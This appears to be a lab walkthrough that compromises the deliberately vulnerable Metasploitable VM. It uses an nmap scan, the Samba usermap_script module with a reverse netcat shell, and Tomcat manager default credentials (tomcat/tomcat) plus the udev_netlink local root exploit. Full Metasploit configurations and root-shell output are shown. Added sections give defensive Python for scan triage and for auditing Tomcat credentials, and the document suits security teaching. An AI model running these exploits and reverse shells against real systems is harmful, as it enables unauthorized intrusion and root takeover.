Metasploitable Walkthrough

Metasploitable is another vulnerable VM designed to practice penetration testing, and especially Metasploit. I could use manual methods like in the previous cases, but I decided to use Metasploit for the exploitation.
I started with NMAP as usual:
root@kali:~# nmap -sS -A 192.168.1.22

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 21:28 CET
Nmap scan report for 192.168.1.22
Host is up (0.0022s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-09T15:28:17-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   2.16 ms 192.168.1.22

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds
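As an added example (not part of the original walkthrough), here is a small Python triage script that parses a constructed excerpt of the scan above and flags the findings the two methods below build on: the Samba 3.0.20 host script result and the Tomcat instance on 8180, plus the cleartext telnet service and the enabled TRACE method. The Samba version range and the wording of each finding are this example's own choices, not nmap output.

```python
import re

# Constructed excerpt of the nmap output above (Samba version only appears in the host block).
SCAN = """\
PORT     STATE SERVICE     VERSION
23/tcp   open  telnet      Linux telnetd
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
Host script results:
|   OS: Unix (Samba 3.0.20-Debian)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|[_ ]\s*(.*)$")

def parse_scan(text):
    """Group each NSE script line under the port (or host) block it follows."""
    ports, host, current = [], {"scripts": []}, None
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            current = host
            continue
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m[1]), "state": m[3], "service": m[4],
                       "version": m[5].strip(), "scripts": []}
            ports.append(current)
        elif (s := SCRIPT_RE.match(line)) and current is not None:
            current["scripts"].append(s[1].strip())
    return ports, host

def triage(ports, host):
    """Flag what this walkthrough relies on (Samba, Tomcat) plus cleartext telnet and TRACE."""
    findings = []
    for p in (p for p in ports if p["state"] == "open"):
        if p["service"] == "telnet":
            findings.append((p["port"], "telnet: cleartext remote login exposed"))
        if any("TRACE" in s for s in p["scripts"]):
            findings.append((p["port"], "HTTP TRACE method enabled"))
        if "Tomcat" in p["version"]:
            findings.append((p["port"], "Tomcat exposed: verify /manager is not on default credentials"))
    for s in host["scripts"]:
        m = re.search(r"Samba (\d+\.\d+\.\d+)", s)
        if m and (3, 0, 20) <= tuple(map(int, m[1].split("."))) <= (3, 0, 25):
            findings.append(("smb", f"Samba {m[1]}: in the version range usermap_script targets"))
    return findings
```

Feed it the full `nmap -A` output of your own host instead of the excerpt; lines that match none of the rules are parsed but produce no finding.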
As everything is too easy with Metasploit I will show two methods.

Method 1 - Samba

If we do a Google search for Samba 3.0.20 exploit, we run into the following web page:
http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
which is exactly the MSF module we need. Configuring and running MSF:
msf exploit(usermap_script) > set RHOST 192.168.1.22
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 192.168.1.17
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.22     yes       The target address
   RPORT  139              yes       The target port


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 1 opened (192.168.1.17:4444 -> 192.168.1.22:59321) at 2013-11-09 21:46:52 +0100

python -c 'import pty; pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/#
As Samba was running with root privileges we are done...

Method 2 - via Tomcat Manager + UDEV Netlink local exploit

There is a Tomcat service at port 8180, and if we navigate to it we can find the default links, to the manager, admin page and so on. If we do a quick Google search we can find that the default Tomcat manager username and password are tomcat/tomcat. I tried and it really worked. Now we only need the exploit:
http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy
Here is the related MSF configuration:
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.22     yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM...
[*] Sending stage (30355 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.17:4444 -> 192.168.1.22:42541) at 2013-11-09 22:06:25 +0100

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55
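As an added defender-side example (not part of the original walkthrough), the following Python check audits a tomcat-users.xml for the weakness Method 2 relied on: an account holding a manager role whose password is empty, a well-known default, or equal to the username. Both XML documents are constructed; the hardened one uses the namespaced Tomcat 7+ layout and the manager-gui role to show that the check handles both the 5.5 and the newer file format.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml in the weak state the walkthrough found (Tomcat 5.5 role names).
WEAK = """<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
</tomcat-users>
"""

# Constructed hardened form: a dedicated manager account with an unguessable password.
FIXED = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="deployer" password="CHANGE-ME-to-a-long-random-secret" roles="manager-gui"/>
</tomcat-users>
"""

# Roles that grant access to the manager/host-manager/admin apps across Tomcat versions.
MANAGER_ROLES = {"manager", "manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin", "admin-gui", "admin-script"}
# The credential the walkthrough shows working against Metasploitable; extend from your own list.
DEFAULT_PASSWORDS = {"tomcat"}

def local_name(tag):
    """Strip an XML namespace so Tomcat 7+ files (xmlns=...) parse like 5.5 ones."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return (username, reason) for every user whose manager access is guarded
    by an empty, username-equal, or well-known default password."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local_name(el.tag) != "user":
            continue
        user = el.get("username", "")
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if not roles & MANAGER_ROLES:
            continue  # a weak password on a non-manager account is not what this check is for
        if pw == "":
            findings.append((user, "manager role with empty password"))
        elif pw.lower() == user.lower():
            findings.append((user, "manager role with password equal to username"))
        elif pw in DEFAULT_PASSWORDS:
            findings.append((user, "manager role with well-known default password"))
    return findings
```

Run it against the file Tomcat actually loads (conf/tomcat-users.xml under CATALINA_BASE); note that it only reads the file, so the manager app being reachable from the network is a separate thing to check.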

As we can see we are not root yet, but a limited tomcat55 account. Let's put meterpreter to the background ('background' command) and look for a local root exploit.
I picked up the following:
http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart     use exploit/linux/local/sock_sendpage   use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec  use exploit/linux/local/udev_netlink
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > set SESSION 3
SESSION => 3
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1. Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.22:48408) at 2013-11-09 22:14:30 +0100

id
uid=0(root) gid=0(root)

...and we are root.
There are more methods, but I will leave them to you.
